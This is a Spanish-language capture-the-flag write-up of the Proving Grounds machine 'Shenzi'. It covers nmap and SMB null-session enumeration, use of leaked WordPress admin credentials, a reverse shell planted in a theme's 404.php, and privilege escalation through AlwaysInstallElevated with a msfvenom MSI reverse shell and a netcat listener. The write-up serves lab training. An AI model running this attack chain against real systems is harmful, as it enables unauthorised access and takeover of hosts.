> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-shenzi-enum-smb-nullsesion-+-directory-web-nombre-del-recurso-compartido-+-wordpress-rc.md).

# MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC

Enumere los puertos de la maquina.

```
nmap -p- --open -sS --min-rate 3000 -n -vvv -Pn 192.168.104.55 -oG Basicscan.txt
```

![](/files/ComxCr7iGojeOoJlxPfq)

Puertos abiertos:

`21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669`

Realice una enumeración de los servicios y sus versiones.

```
nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 -sCV
```

![](/files/TwtcSYAr3WZChOBofBcP)

Busque si estos servicios contienen alguna vulnerabilidad utilizando scripts de nmap, pero no contenían ninguna vuln.

```
nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 --sc
```

![](/files/cBCtSRGgLYNO6degzEnv)

![](/files/TP9JHaOIOQ3lrTl8lq5t)

Utilice la herramienta nxc para verificar ante que windows me enfrento.

```
nxc smb 192.168.104.55
```

![](/files/bBAZk63EXAMhg2ywzvwE)

Con smbclient utilizando el parámetro -N para que me conecte a través de una null sesión y luego el parámetro -L para que liste los recursos compartidos del servicio SMB.

```
smbclient -N -L 192.168.104.55
```

![](/files/ZFPjinq0NpYSalMQdCUX)

Dentro de los recurso encontre una carpeta con nombre "Shenzi".

Con el siguiente comando a través de la null sesión accedí al servicio SMB.

```
smbclient -N \\192.168.104.55\\shenzi
```

Ya dentro de la carpeta, descargo el contenido con el comando "get"

![](/files/YIs2g9dBdcQJKmD8gKrK)

Explore el archivo password el cual observe que contiene varias credenciales, la interesante es la del wordpress.

![](/files/my3gveyIhTs8j2cWHLLG)

![](/files/t331qiVbgt13elAq068u)

Ingrese al servicio web que corre tanto en el puerto 80 http como el en servicio web 443 http. En el puerto 80 encontré una web sobre XAMPP.

<http://192.168.104.55/dashboard>

![](/files/J7nWQHWEwUtwr8JW7GZU)

Con wappalizer observe las tecnlogias que corren en el sitio web.

![](/files/UQSjmjkfKVrBkFnRk1Xi)

Encontré un apartado donde puedo observar el phpinfo.

![](/files/ofdtbVXjrQUhr5Zzjpaj)

![](/files/tSozweZMauWAu14PeQgq)

Realice una búsqueda de directorios pero no encontré nada interesante.

Coloque el nombre del archivo compartido "shenzi" como directorio y me llevo a un wordpress.

![](/files/yqeEi7HjbZvJKm3ZDXK8)

![](/files/RJpiHCwmHTVhVxbx9afs)

En el puerto 80 al dirigirme al panel de sesión me devuelve un error por lo que realice lo mismo pero en el puerto 443 https.

![](/files/ZcjG6u6D9o4suyGsLTwy)

Logre acceder al panel de sesión, seguido coloque las credenciales encontradas aquí y me adentre al panel como administrador.

![](/files/XYSLs4krlyP1vqoQGIoK)

![](/files/WVFyy6b1vexTefijsxX1)

Para realizar una revershell modifique el contenido del error 404.php editando los temas.

![](/files/oq5DZiFNTbSXPjpOdkfe)

![](/files/Sgc52RkAzSfDwJQPDQlm)

![](/files/C0nEp8LXe5hkzEQuMtFN)

Una vez que agregue mi revershell maliciosa actualice la web seguidamente en mi kali coloque me puse en escucha con netcat.

```
rlwrap nc -nlvp 80 # mi kali
```

Ya listo en la URL me dirijo al apartado 404.php donde esta mi revershell

<https://192.168.104.55/404.php>

Esto va a devuelve la conexión a mi maquina kali.

<figure><img src="/files/te0jylzRAAyCKX4nY2gl" alt=""><figcaption></figcaption></figure>

Ya dentro de la maquina windows, me cree un carpeta de trabajo llamada /tmp, ahora subi el ejecutable winpeas y luego lo ejecuto.

<figure><img src="/files/fy9oZ8BAdnNzbkknO2d2" alt=""><figcaption></figcaption></figure>

Terminado de realizar el reconocimiento observe que tengo el permiso AlwaysInstallElevated.

<figure><img src="/files/7bdOwBT6uZar8LJ7J0qZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5yhLOqF5Pg1zprMu86ke" alt=""><figcaption></figcaption></figure>

`Cuando la configuración AlwaysInstallElevated  se establece en 1 en ambos el HKLM (HKEY_LOCAL_MACHINE) y HKCU (HKEY_CURRENT_USER) claves de registro, indica que los paquetes de instalación se están instalando con privilegios elevados`

Para abusar de esto y poder escalar privilegios lo que realice fue crear un ejecutable con msfvenom.

```
msfvenom -p windows/x64/shell_reverse_rcp LHOST=192.168.45.233 LPORT=1234 -f msi > r
```

<figure><img src="/files/eFiLCxmlvGozevje6MfZ" alt=""><figcaption></figcaption></figure>

La extensión MSI:

Un archivo MSI es un archivo de instalación de Microsoft Windows Installer. Este tipo de archivo se utiliza para instalar, actualizar y desinstalar software en sistemas operativos Windows.

Luego subí el binario de netcat x64 como la revershell.msi

<figure><img src="/files/ECJIlqDRTlIRswHUtOB8" alt=""><figcaption></figcaption></figure>

Ya teniendo estos 2 archivos me conecte en mi kali por el puerto donde cree la revershell.msi "1234" y seguido a eso ejecute la revershell.msi en la maquina windows.

<figure><img src="/files/GpAM86dCKdhRcT5XAkZL" alt=""><figcaption></figcaption></figure>
